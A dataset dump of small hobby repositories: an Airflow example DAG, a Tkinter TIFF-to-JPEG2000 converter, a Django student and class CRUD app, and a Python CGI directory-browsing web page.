"num_lines": 39,
"path": "/dags/dag.py",
"repo_name": "Jackjaps/JacobsRepo",
"src_encoding": "UTF-8",
"text": "from datetime import timedelta\n\nfrom airflow import DAG\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.utils.dates import days_ago\n\nargs = {\n 'owner': 'airflow',\n}\n\ndag = DAG(\n dag_id='Jonathan_bash_operator',\n default_args=args,\n schedule_interval='0 0 * * *',\n start_date=days_ago(2),\n dagrun_timeout=timedelta(minutes=60),\n tags=['example']\n)\n\ntask1 = DummyOperator(\n task_id='Start',\n dag=dag\n)\n\n# [START howto_operator_bash]\ntask2 = BashOperator(\n task_id='bash_jacobo',\n bash_command='echo \"esta es una ejecucion normal\"',\n dag=dag,\n)\n# [END howto_operator_bash]\n\ntask1 >> task2\n\n#if __name__ == \"__main__\":\n# dag.cli()\n\n# test git\n"
}
] | 2 |
jmswaney/tif2jp2
|
https://github.com/jmswaney/tif2jp2
|
b9ec3d808ded621801c18e5e87cdf3e54c6f2274
|
b961e1c25b3ad6d2742d89b0e1955e277e908fb0
|
67e45d274aa8a1018118e7e2b9017ea5a86b5ab7
|
refs/heads/master
| 2021-04-28T14:51:23.209279 | 2019-01-30T23:13:21 | 2019-01-30T23:13:21 | 121,974,846 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7532467246055603,
"alphanum_fraction": 0.8311688303947449,
"avg_line_length": 37.5,
"blob_id": "490d6909f4a05320870d92bbeb72187cbf9171f5",
"content_id": "c1a90a76c413ac060b561dae3972518ae9b9e154",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 77,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 2,
"path": "/README.md",
"repo_name": "jmswaney/tif2jp2",
"src_encoding": "UTF-8",
"text": "# tif2jp2\nSimple Tkinter app for converting tiff images into JPEG2000 images\n"
},
{
"alpha_fraction": 0.6579247713088989,
"alphanum_fraction": 0.6932725310325623,
"avg_line_length": 31.518518447875977,
"blob_id": "3b2d3bb3395c2c5db15df8e36a2c86c1fa6609c7",
"content_id": "88652e724ef1c8af406d870ecdd18ff8f2665ad9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 877,
"license_type": "permissive",
"max_line_length": 135,
"num_lines": 27,
"path": "/setup.py",
"repo_name": "jmswaney/tif2jp2",
"src_encoding": "UTF-8",
"text": "import cx_Freeze\nimport sys\nimport os\n\nincludes = ['tifffile', 'skimage']\ninclude_files = [r'C:\\Users\\Justin Swaney\\Anaconda3\\envs\\tif2jp2\\DLLs\\tcl86t.dll',\n\tr'C:\\Users\\Justin Swaney\\Anaconda3\\envs\\tif2jp2\\DLLs\\tk86t.dll',\n\t'logo.ico']\n\nos.environ['TCL_LIBRARY'] = r'C:\\Users\\Justin Swaney\\Anaconda3\\envs\\tif2jp2\\tcl\\tcl8.6'\nos.environ['TK_LIBRARY'] = r'C:\\Users\\Justin Swaney\\Anaconda3\\envs\\tif2jp2\\tcl\\tk8.6'\n\nbase = None\n\nif sys.platform == 'win32':\n\tbase = 'Win32GUI'\n\nexecutables = [cx_Freeze.Executable('src/tif_downsampler.py', base=base, icon='logo.ico')]\n\ncx_Freeze.setup(\n\tname = 'tif_downsampler',\n\toptions = {'build_exe': {'packages': ['tkinter', 'skimage', 'multiprocessing', 'tifffile', 'numpy', 'lxml', 'pkg_resources._vendor'], \n\t\t\t'include_files': include_files, 'includes': includes}},\n\tversion = '0.02',\n\tdescription = 'An app to convert tifs to JPEG2000',\n\texecutables = executables\n\t)"
},
{
"alpha_fraction": 0.6796174645423889,
"alphanum_fraction": 0.6927675008773804,
"avg_line_length": 30.876190185546875,
"blob_id": "3cd30e85d433c38ec44d024e6f3c3009f94b5e68",
"content_id": "a7dd96f929737217da9af5cdf759926a5a240665",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3346,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 105,
"path": "/src/tif2jp2.py",
"repo_name": "jmswaney/tif2jp2",
"src_encoding": "UTF-8",
"text": "import tkinter as tk\nfrom tkinter import filedialog\nfrom tkinter import ttk\nfrom pathlib import Path\nimport tifffile\nfrom PIL import Image\nimport multiprocessing\n\n\ndef save_as_jp2(arg_dict):\n\tinput_path = arg_dict['input_path']\n\toutput_path = arg_dict['output_path']\n\ttif_path = arg_dict['tif_path']\n\n\ttif_img = tifffile.imread(str(tif_path))\n\timg = Image.fromarray(tif_img)\n\n\toutput_subdir = output_path.joinpath(tif_path.relative_to(input_path).parent)\n\toutput_subdir.mkdir(parents=True, exist_ok=True)\n\n\tjp2_filename = tif_path.stem + '.jp2'\n\tjp2_path = output_subdir.joinpath(jp2_filename)\n\timg.save(jp2_path, quality_mode='rates', quality_layers=[20])\n\nclass MainApplication(tk.Frame):\n\n\tdef __init__(self, parent, *args, **kwargs):\n\t\tsuper().__init__(parent, *args, **kwargs)\n\t\tself.parent = parent\n\t\tself.build_elements()\n\n\tdef build_elements(self):\n\t\tself.parent.title('tif2jp2')\n\n\t\t# Setup the grid layout\n\t\tself.parent.rowconfigure(5, weight=1)\n\t\tself.parent.columnconfigure(5, weight=1)\n\t\tself.grid(sticky=tk.W + tk.E + tk.N + tk.S)\n\n\t\t# Add an extry box for the input directory\n\t\tself.input_entry = tk.Entry(self, width=60)\n\t\tself.input_entry.grid(row=1, column=1, padx=2, pady=2, sticky=tk.W)\n\t\tself.input_entry.insert(0, 'Browse to the root image directory with tifs -->')\n\n\t\t# Add a progress bar\n\t\tself.progress_bar = ttk.Progressbar(self, length=360, mode='determinate')\n\t\tself.progress_bar.grid(row=2, column=1, padx=2, pady=2, sticky=tk.E)\n\n\t\t# Create variables to store the directories\n\t\tself.input_path = None\n\t\tself.output_path = None\n\n\t\t# Make a browse button\n\t\tself.browse_btn = tk.Button(self, text='Browse', width=10, command=self.get_directory)\n\t\tself.browse_btn.grid(row=1, column=2, sticky=tk.W)\n\n\t\t# Make a convert button\n\t\tself.convert_btn = tk.Button(self, text='Convert', width=10, command=self.convert)\n\t\tself.convert_btn.grid(row=2, column=2, sticky=tk.W)\n\n\tdef set_entry_text(self, text):\n\t\tself.input_entry.delete(0, tk.END)\n\t\tself.input_entry.insert(0, text)\n\n\tdef get_directory(self):\n\t\tbrowse_str = filedialog.askdirectory(parent=self.parent, title='Please select the root image directory')\n\t\tin_p = Path(browse_str)\n\t\tif in_p.exists():\n\t\t\tself.set_entry_text(str(in_p))\n\t\t\tself.input_path = in_p\t\t\n\n\tdef convert(self):\n\t\tif self.input_path is not None and self.input_path.exists() and self.input_path.is_dir():\n\n\t\t\tself.output_path = Path(self.input_path.parent).joinpath(str(self.input_path)+'_jp2')\n\t\t\t# self.output_path = Path(self.input_path.parent).joinpath(str(self.input_path)+'_jpg')\n\t\t\tself.output_path.mkdir(exist_ok=True)\n\n\t\t\ttif_paths = list(self.input_path.glob('**/*.tif*'))\n\t\t\tnb_tifs = len(tif_paths)\n\n\t\t\tself.progress_bar['value'] = 0\n\t\t\tself.progress_bar['maximum'] = nb_tifs-1\n\t\t\t\n\t\t\targ_dicts = []\n\t\t\tfor i, tif_path in enumerate(tif_paths):\n\t\t\t\targ_dict = {\n\t\t\t\t\t'input_path': self.input_path,\n\t\t\t\t\t'output_path': self.output_path,\n\t\t\t\t\t'tif_path': tif_path,\n\t\t\t\t}\n\t\t\t\targ_dicts.append(arg_dict)\n\n\t\t\tnb_cpu = multiprocessing.cpu_count()\n\t\t\tnb_processes = max(1, nb_cpu-1)\n\t\t\twith multiprocessing.Pool(processes=nb_processes) as p:\n\t\t\t\tfor i, _ in enumerate(p.imap_unordered(save_as_jp2, arg_dicts)):\n\t\t\t\t\tself.progress_bar['value'] = i\n\t\t\t\t\tself.parent.update()\n\nif __name__ == '__main__':\n\tmultiprocessing.freeze_support()\n\troot = tk.Tk()\n\tapp = MainApplication(root)\n\troot.mainloop()"
}
] | 3 |
brenothales/crud-django
|
https://github.com/brenothales/crud-django
|
0e10833857317ab74634b4057419c6008dc176e8
|
46b080f2119fa2f6ac89359f5774d0e4d2f00cae
|
d0e90c2c81929aef769a113a567d48e2e204b730
|
refs/heads/master
| 2021-01-13T05:12:28.672907 | 2017-02-07T21:49:49 | 2017-02-07T21:49:49 | 81,257,753 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8062015771865845,
"alphanum_fraction": 0.8062015771865845,
"avg_line_length": 20.33333396911621,
"blob_id": "b81fbd9ed7296cc52445e228834a6461011499a2",
"content_id": "3e85ebd0b25c2044d45c6d00e6aab0b84201c36a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 129,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 6,
"path": "/alunos/admin.py",
"repo_name": "brenothales/crud-django",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom alunos.models import Turma, Aluno\n\n\nadmin.site.register(Turma)\nadmin.site.register(Aluno)\n\n"
},
{
"alpha_fraction": 0.6041666865348816,
"alphanum_fraction": 0.6041666865348816,
"avg_line_length": 30.91666603088379,
"blob_id": "8c3af928b6786afa63d888552063c72f4bfb6586",
"content_id": "485d2c311933c17e5d75f11762f5292ffd9616b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 384,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 12,
"path": "/turmas/urls.py",
"repo_name": "brenothales/crud-django",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import patterns, include, url\n\nfrom . import views\n\n\nurlpatterns = patterns('turmas.views',\n # url(r'^', 'lista', name='lista'),\n url(r'^lista', 'lista', name='lista'),\n url(r'^create/$', 'create', name='create'),\n url(r'^delete/(?P<codigoTurma>\\d+)$', 'delete', name='delete'),\n url(r'^update/(?P<codigoTurma>\\d+)$', 'update', name='update'),\n)\n\n"
},
{
"alpha_fraction": 0.680115282535553,
"alphanum_fraction": 0.680115282535553,
"avg_line_length": 22.200000762939453,
"blob_id": "56db7a00fc65d40dc69c7ad4d51bd4fabe137d4a",
"content_id": "a414b7113c86ab3a8e81188a37462388bc938d13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 347,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 15,
"path": "/turmas/forms.py",
"repo_name": "brenothales/crud-django",
"src_encoding": "UTF-8",
"text": "from django.forms import ModelForm\nfrom alunos.models import Aluno\nfrom alunos.models import Turma\n\n\n\nclass AlunoForm(ModelForm):\n class Meta:\n \tmodel = Aluno\n \tfields = ['nomeAluno', 'cpf','telefone', 'dataNasc', 'turma']\n\nclass TurmaForm(ModelForm):\n class Meta:\n model = Turma\n fields = ['nomeTurma', 'descricaoTurma']"
},
{
"alpha_fraction": 0.7282463312149048,
"alphanum_fraction": 0.7289156913757324,
"avg_line_length": 26.648147583007812,
"blob_id": "d477b5de65d649bead9b2cba23d4bfb1ec92ebe2",
"content_id": "c8d6a9d122bad76e385189bfb9e2e77424d05d24",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1494,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 54,
"path": "/alunos/views.py",
"repo_name": "brenothales/crud-django",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect\nfrom forms import AlunoForm\nfrom alunos.models import Aluno\nfrom django.shortcuts import render, redirect\nfrom alunos.models import Aluno\nfrom alunos.forms import AlunoForm\n\n\ndef lista(request):\n\talunos = Aluno.objects.all()\n\tcontext = RequestContext(request, {'alunos': alunos})\n\treturn render_to_response('aluno/list.html', context)\n\n\ndef create(request):\n\tform = AlunoForm(request.POST or None)\n\t\n\tif request.method == 'POST' and form.is_valid():\n\t\tform.save()\n\t\treturn redirect('/alunos/')\n\n\tcontext = RequestContext(request, {'form': form})\n\treturn render_to_response('aluno/create.html', context)\n\n\ndef delete(request, codigoAluno):\n aluno = Aluno.objects.get(pk=codigoAluno)\n\n if request.method == \"POST\":\n aluno.delete()\n return HttpResponseRedirect('/alunos/')\n\n context = RequestContext(request, {'aluno': aluno})\n return render_to_response('aluno/delete.html', context)\n\n\ndef update(request, codigoAluno):\n\talunos = Aluno.objects.get(pk=codigoAluno)\n\t\n\tif request.method == 'POST':\n\t\tform = AlunoForm(request.POST, instance=alunos)\n\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn HttpResponseRedirect('/alunos/')\n\n\telse:\n\t\tform = AlunoForm(instance=alunos)\n\t\t\n\tcontext = RequestContext(request, {'form': form, 'codigoAluno': codigoAluno})\n\treturn render_to_response('aluno/update.html', context)\t\n"
},
{
"alpha_fraction": 0.6409952640533447,
"alphanum_fraction": 0.6540284156799316,
"avg_line_length": 28.034482955932617,
"blob_id": "f85f998cb0260c5c7df8b450da6e95fec6676287",
"content_id": "ebb5c566a2176b3e070dbd0930e28639115c543d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 844,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 29,
"path": "/alunos/models.py",
"repo_name": "brenothales/crud-django",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom django.db import models\n\nclass Aluno(models.Model):\n\n codigoAluno = models.IntegerField(primary_key=True) \n nomeAluno = models.CharField('Nome completo', max_length=200)\n cpf = models.CharField('CPF', max_length=14, unique=True)\n telefone = models.CharField('Telefone', max_length=(11))\n dataNasc = models.DateField('Data de nascimento')\n\n turma = models.ForeignKey('Turma')\n\n def __unicode__(self):\n return self.nomeAluno\n\nclass Turma(models.Model):\n \n codigoTurma = models.IntegerField(primary_key=True) \n nomeTurma = models.CharField('Nome completo', max_length=200)\n descricaoTurma = models.TextField()\n\n\n class Meta:\n verbose_name = u'Turma'\n verbose_name_plural = u'Turmas'\n\n def __unicode__(self):\n return self.nomeTurma\n\n\n"
},
{
"alpha_fraction": 0.5300072431564331,
"alphanum_fraction": 0.537960946559906,
"avg_line_length": 33.57500076293945,
"blob_id": "cc06cdd6a7dd39417504ef1c855081849aadd44d",
"content_id": "0e41a267b7edc9e6e1fb950e3aa9b3132215a591",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1383,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 40,
"path": "/turmas/migrations/0001_initial.py",
"repo_name": "brenothales/crud-django",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Aluno',\n fields=[\n ('codigoAluno', models.IntegerField(serialize=False, primary_key=True)),\n ('nomeAluno', models.CharField(max_length=200, verbose_name=b'Nome completo')),\n ('cpf', models.CharField(unique=True, max_length=14, verbose_name=b'CPF')),\n ('telefone', models.CharField(max_length=11, verbose_name=b'Telefone')),\n ('dataNasc', models.DateField(verbose_name=b'Data de nascimento')),\n ],\n ),\n migrations.CreateModel(\n name='Turma',\n fields=[\n ('codigoTurma', models.IntegerField(serialize=False, primary_key=True)),\n ('nomeTurma', models.CharField(max_length=200, verbose_name=b'Nome da turma')),\n ('descricaoTurma', models.TextField()),\n ],\n options={\n 'verbose_name': 'Turma',\n 'verbose_name_plural': 'Turmas',\n },\n ),\n migrations.AddField(\n model_name='aluno',\n name='turma',\n field=models.ForeignKey(to='turmas.Turma'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.8020833134651184,
"alphanum_fraction": 0.8020833134651184,
"avg_line_length": 17.799999237060547,
"blob_id": "15bb8c21491796507afcf4dfd6452c12c9c1640d",
"content_id": "7f26d34e363eca1ca2586b28fc3636b629b3f803",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 96,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 5,
"path": "/turmas/admin.py",
"repo_name": "brenothales/crud-django",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom turmas.models import Turma\n\n\nadmin.site.register(Turma)\n\n\n"
},
{
"alpha_fraction": 0.6618357300758362,
"alphanum_fraction": 0.6618357300758362,
"avg_line_length": 30.846153259277344,
"blob_id": "597b84f958be39df35542025f70787c4103c10d3",
"content_id": "824360bb7e69d2a193a63519e64360257a58f0b3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 414,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 13,
"path": "/djangotest/urls.py",
"repo_name": "brenothales/crud-django",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n\n url(r'^blog/', include('core.urls', namespace='core')),\n url(r'^alunos/', include('alunos.urls', namespace='alunos')),\n url(r'^turmas/', include('turmas.urls', namespace='turmas')),\n url(r'^', include('core.urls')),\n url(r'^admin/', include(admin.site.urls)),\n)\n"
},
{
"alpha_fraction": 0.7291527390480042,
"alphanum_fraction": 0.7298198938369751,
"avg_line_length": 26.740739822387695,
"blob_id": "f26a278a3b7a744e40c80889837d26fe25e848f9",
"content_id": "4ce40974ebcb2097c5c9ec34524765eb65a983c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1499,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 54,
"path": "/turmas/views.py",
"repo_name": "brenothales/crud-django",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect\nfrom forms import TurmaForm\nfrom turmas.models import Turma\nfrom django.shortcuts import render, redirect\nfrom turmas.models import Turma\nfrom turmas.forms import TurmaForm\n\n\ndef lista(request):\n\tturmas = Turma.objects.all()\n\tcontext = RequestContext(request, {'turmas': turmas})\n\treturn render_to_response('turma/list.html', context)\n\n\ndef create(request):\n\tform = TurmaForm(request.POST or None)\n\t\n\tif request.method == 'POST' and form.is_valid():\n\t\tform.save()\n\t\treturn redirect('/turmas/lista')\n\n\tcontext = RequestContext(request, {'form': form})\n\treturn render_to_response('turma/create.html', context)\n\n\ndef delete(request, codigoTurma):\n turma = Turma.objects.get(pk=codigoTurma)\n\n if request.method == \"POST\":\n turma.delete()\n return HttpResponseRedirect('/turmas/')\n\n context = RequestContext(request, {'turma': turma})\n return render_to_response('turma/delete.html', context)\n\n\ndef update(request, codigoTurma):\n\tturmas = Turma.objects.get(pk=codigoTurma)\n\t\n\tif request.method == 'POST':\n\t\tform = TurmaForm(request.POST, instance=turmas)\n\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn HttpResponseRedirect('/turmas/')\n\n\telse:\n\t\tform = TurmaForm(instance=turmas)\n\t\t\n\tcontext = RequestContext(request, {'form': form, 'codigoTurma': codigoTurma})\n\treturn render_to_response('turma/update.html', context)\t\n"
}
] | 9 |
eszepto/fileexploror
|
https://github.com/eszepto/fileexploror
|
0db30b53397a7021f7ec6bf1ba217d8bd8a1e362
|
c4df180928e50a5098562229458aa6cd118b2dc0
|
f10833321c95d5f00fa52ea3c314d400d1f6ca8d
|
refs/heads/master
| 2021-07-06T16:55:31.661921 | 2021-01-16T14:21:25 | 2021-01-16T14:21:25 | 222,747,631 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4673157036304474,
"alphanum_fraction": 0.47148817777633667,
"avg_line_length": 19.724637985229492,
"blob_id": "f6e14ab0ed6b5bdb8412d64fa786c11397406597",
"content_id": "3798f34a1996bd1133bb96980e981032306a7ce4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1438,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 69,
"path": "/cgi-bin/anypage.py",
"repo_name": "eszepto/fileexploror",
"src_encoding": "UTF-8",
"text": "import sys,os\nimport cgi, cgitb\nimport urllib.parse\nprint(\"Content-type:text/html\\r\\n\\r\\n\\n\")\nform = cgi.FieldStorage() \nuser_path = form.getvalue('path')\n\n\ndef GetPrevPath(current_path):\n return current_path[::-1].split('/',maxsplit=1)[1][::-1]\ndef main(current_path=\"C:/\"):\n \n current_path = current_path.replace('\\\\','/')\n \n html = \"\"\n\n html += \"<html>\" + \"\\n\"\n html += \"<head></head>\" + \"\\n\"\n html += \"<body>\" + \"\\n\"\n\n html += \"<h1>%s</h1>\" %(current_path) + \"\\n\"\n html += '<br/>' + \"\\n\"\n \n html+=\"\"\"\n <form action=/cgi-bin/main.py >\n\n <input type=\"text\" name=\"path\"/>\n \n <input type = \"submit\" value = \"GO\" />\n\n </form>\n\n \"\"\"\n prev_path = GetPrevPath(current_path)\n if (prev_path == \"C:/\"):\n html += \"\"\"\n \n <form action=/cgi-bin/anypage.py?path=%s>\n\n <input type=\"submit\" value=\"<\" />\n\n </form>\n \"\"\" %(prev_path)\n else:\n html += \"\"\"\n \n <form action=/cgi-bin/main.py >\n\n <input type=\"submit\" value=\"<\" />\n\n </form>\n \"\"\" \n \n\n for i in os.listdir(current_path):\n html += '<a href=\"/cgi-bin/main.py?path=%s\"> %s </a>' %(current_path+\"/\"+i, i) + \"\\n\"\n html += '<br/>' + \"\\n\"\n \n\n html += \"</body>\" + \"\\n\"\n html += \"</html>\" + \"\\n\"\n \n return html\n \nif(user_path == None):\n print(main())\nelse:\n print(user_path)\n print(main(user_path))\n\n\n\n \n"
},
{
"alpha_fraction": 0.4823633134365082,
"alphanum_fraction": 0.485890656709671,
"avg_line_length": 17.57377052307129,
"blob_id": "5045886d6a6269b7a8214bab732b2e7efcc11a11",
"content_id": "c7e657aa09940963fb9806dbfc5ee3558359bd44",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1134,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 61,
"path": "/cgi-bin/2.py",
"repo_name": "eszepto/fileexploror",
"src_encoding": "UTF-8",
"text": "import sys,os\nimport cgi, cgitb\nprint(\"Content-type:text/html\\r\\n\\r\\n\\n\")\nform = cgi.FieldStorage() \nuser_path = form.getvalue('path')\n\nprev_path = os.path.abspath(\"../\")\n\ndef main(current_path=os.getcwd()):\n \n current_path = current_path.replace('\\\\','/')\n \n html = \"\"\n\n html += \"<html>\" + \"\\n\"\n html += \"<head></head>\" + \"\\n\"\n html += \"<body>\" + \"\\n\"\n\n html += \"<h1>%s</h1>\" %(current_path) + \"\\n\"\n html += '<br/>' + \"\\n\"\n \n html+=\"\"\"\n <form action=/cgi-bin/2.py >\n\n <input type=\"text\" name=\"path\"/>\n \n <input type = \"submit\" value = \"GO\" />\n\n </form>\n\n \"\"\"\n html += \"\"\"\n \n <form action=/cgi-bin/2.py >\n\n <input type=\"submit\" value=\"<\"/>\n\n </form>\n \"\"\"\n\n for i in os.listdir(current_path):\n html += '<a href=\"/%s\">%s</a>' %(i,i) + \"\\n\"\n html += '<br/>' + \"\\n\"\n \n\n html += \"</body>\" + \"\\n\"\n html += \"</html>\" + \"\\n\"\n \n return html\n \nif(user_path == None):\n print(main())\nelse:\n print(user_path)\n print(main(user_path))\n\n\ndef GetPrevPath(current_path):\n current_path = str(current_path).split('/')\n pass\n return\n\n"
},
{
"alpha_fraction": 0.7547169923782349,
"alphanum_fraction": 0.7547169923782349,
"avg_line_length": 16.66666603088379,
"blob_id": "ea5e43a298ee975654691f241d3391529bfcc93b",
"content_id": "aaa3ef1cded404175c6e664497b9a092dfaea4cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 53,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 3,
"path": "/README.md",
"repo_name": "eszepto/fileexploror",
"src_encoding": "UTF-8",
"text": "# fileexploror\n\nfirst webpage is in /cgi-bin/main.py\n"
},
{
"alpha_fraction": 0.4296296238899231,
"alphanum_fraction": 0.4333333373069763,
"avg_line_length": 20.600000381469727,
"blob_id": "bcbe31ca8d946bb3da6be9e562ef774dab3ab2db",
"content_id": "bffb6ee5d37d3087174294855680c2e2459a4aaa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 540,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 25,
"path": "/cgi-bin/index.py",
"repo_name": "eszepto/fileexploror",
"src_encoding": "UTF-8",
"text": "import sys,os\nprint(\"Content-type:text/html\\r\\n\\r\\n\")\nprev_path = os.path.abspath(\"../\")\ndef main(current_path=os.getcwd()):\n html = \"\"\n\n html += \"<html>\" + \"\\n\"\n html += \"<head></head>\" + \"\\n\"\n html += \"<body>\" + \"\\n\"\n\n html += \"<h1>%s</h1>\" %(current_path) + \"\\n\"\n html += '<br/>' + \"\\n\"\n \n for i in os.listdir(current_path):\n html += '<a href=\"../%s\">%s</a>' %(i,i) + \"\\n\"\n html += '<br/>' + \"\\n\"\n \n\n html += \"</body>\" + \"\\n\"\n html += \"</html>\" + \"\\n\"\n \n return html\n \n\nprint(main())\n"
},
{
"alpha_fraction": 0.5120179057121277,
"alphanum_fraction": 0.5190982222557068,
"avg_line_length": 31.713415145874023,
"blob_id": "7f49ad79c65d335fc46ef266c801494c7d32619e",
"content_id": "bb58f82881b5efc0f361a962813cd2ea6200b635",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5367,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 164,
"path": "/cgi-bin/main.py",
"repo_name": "eszepto/fileexploror",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\nimport sys,os\nimport cgi, cgitb\nimport urllib.parse\nimport time\nprint(\"Content-type:text/html\\r\\n\\r\\n\\n\")\nsuffixes = ['B', 'KB', 'MB', 'GB', 'TB', 'PB']\ndef humansize(nbytes):\n i = 0\n while nbytes >= 1024 and i < len(suffixes)-1:\n nbytes /= 1024.\n i += 1\n f = ('%.2f' % nbytes).rstrip('0').rstrip('.')\n return '%s %s' % (f, suffixes[i])\n\ndef main(current_path= str(os.path.dirname(os.path.abspath(__file__))).split('\\\\')[0]+\"/\"):\n \n current_path = current_path.replace('\\\\','/')\n\n html = \"\"\n html += \"<html>\" + \"\\n\"\n \n html += '<head>'\n html += '<meta charset=\"UTF-8\" />'\n html += '<link rel=\"stylesheet\" href=\"/styles.css\">'\n html += '</head>' + \"\\n\"\n \n html += \"<body>\" + \"\\n\"\n\n html += \"<h4>%s</h4>\" %(current_path) + \"\\n\"\n html += '<br/>' + \"\\n\"\n \n #Home button\n html += \"\"\"\n <form action='main.py?path=' method=\"POST\" >\n <input type=\"submit\" value=\"Home\" />\n </form>\n \"\"\" \n \n #back Button\n html += \"\"\" \n <form action=\"/cgi-bin/main.py\" method=\"GET\" >\n <input type=\"hidden\" name=\"path\" value=\"%s\" />\n <input type=\"submit\" value=\"Back\" />\n </form>\n \"\"\"%(os.path.abspath(current_path+\"/..\").replace('\\\\','/')) \n \n #go to dir button\n html+=\"\"\"\n <form action='main.py' >\n <input type=\"text\" name=\"path\" placeholder=\"Enter the path\"/>\n <input type = \"submit\" value = \"GO\" />\n </form> \n \"\"\" \n #SystemFileCheckBox\n html += '<input type=\"checkbox\" id=\"SystemFileCheckBox\" checked>hide systemfile</input>'\n \n html += \"<hr>\"\n\n html += '<table cellspacing=\"0\" border=\"0\" id=\"tblDisplay\" cellpading=\"0\">'\n html += \"<thead>\"\n html += '<tr id=\"HeaderRow\">' \n\n html += '<th><input type=\"checkbox\" id=\"SelectAllBox\"/></th>'\n html += \"<th></th>\"\n html += '<th><b onclick=\"SortByName()\">filename</b></th>'\n html += \"<th> </th>\"\n html += \"<th><b>date modified</b></th>\"\n html += \"<th> </th>\"\n html += \"<th><b>size</b></th>\"\n\n html += \"</tr>\"\n html += \"</thead>\"\n \n html += \"<tbody>\"\n html += \"\"\n for i in os.scandir(current_path):\n info = i.stat()\n \n if(i.name[0] == \"$\" or \n i.name[0] == \".\" or\n i.name.lower().startswith(\"boot\") or\n i.name.lower().endswith(\".sys\")):\n \n html += '<tr class=\"ItemTr SystemItem\" hidden>'\n else:\n html += '<tr class=\"ItemTr\">'\n html += '<td><input type=\"checkbox\" class=\"checky\" value=\"%s\" name=\"checkedItem\"/></td>'%i.name\n \n if i.is_dir(): #if is folder, won't show size\n html += \"<td>📁</td>\" # Folder icon\n html += '<td><a href=\"/cgi-bin/main.py?path=%s\">%s<a></td>' %(os.path.join(current_path, i.name).replace(\"\\\\\",\"/\"), i.name) \n html += \"<td> </td>\"\n html += \"<td> %s </td>\" %(time.strftime('%d/%m/%Y %H:%M', time.localtime(info.st_mtime))) \n html += \"<td> </td>\"\n html += \"<td> </td>\"\n elif (i.is_file):\n html += \"<td>📄</td>\" # File icon\n html += '<td><a href=\"%s\">%s</a></td>'%(os.path.join(current_path, i.name).replace(\"\\\\\",\"/\"), i.name)\n html += \"<td> </td>\"\n html += \"<td> %s </td>\" %(time.strftime('%d/%m/%Y %H:%M', time.localtime(info.st_mtime))) \n html += \"<td> </td>\"\n html += \"<td> %s </td>\" %(humansize(info.st_size))\n\n html += \"</tr>\"\n\n html += \"</tbody>\"\n\n html += \"</table>\" + \"\\n\"\n html += '<script type=\"text/javascript\" src=\"http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js\"></script>'\n html += '<script type=\"text/javascript\" src=\"/eventhandler.js\"></script>'\n html += \"<hr>\"\n 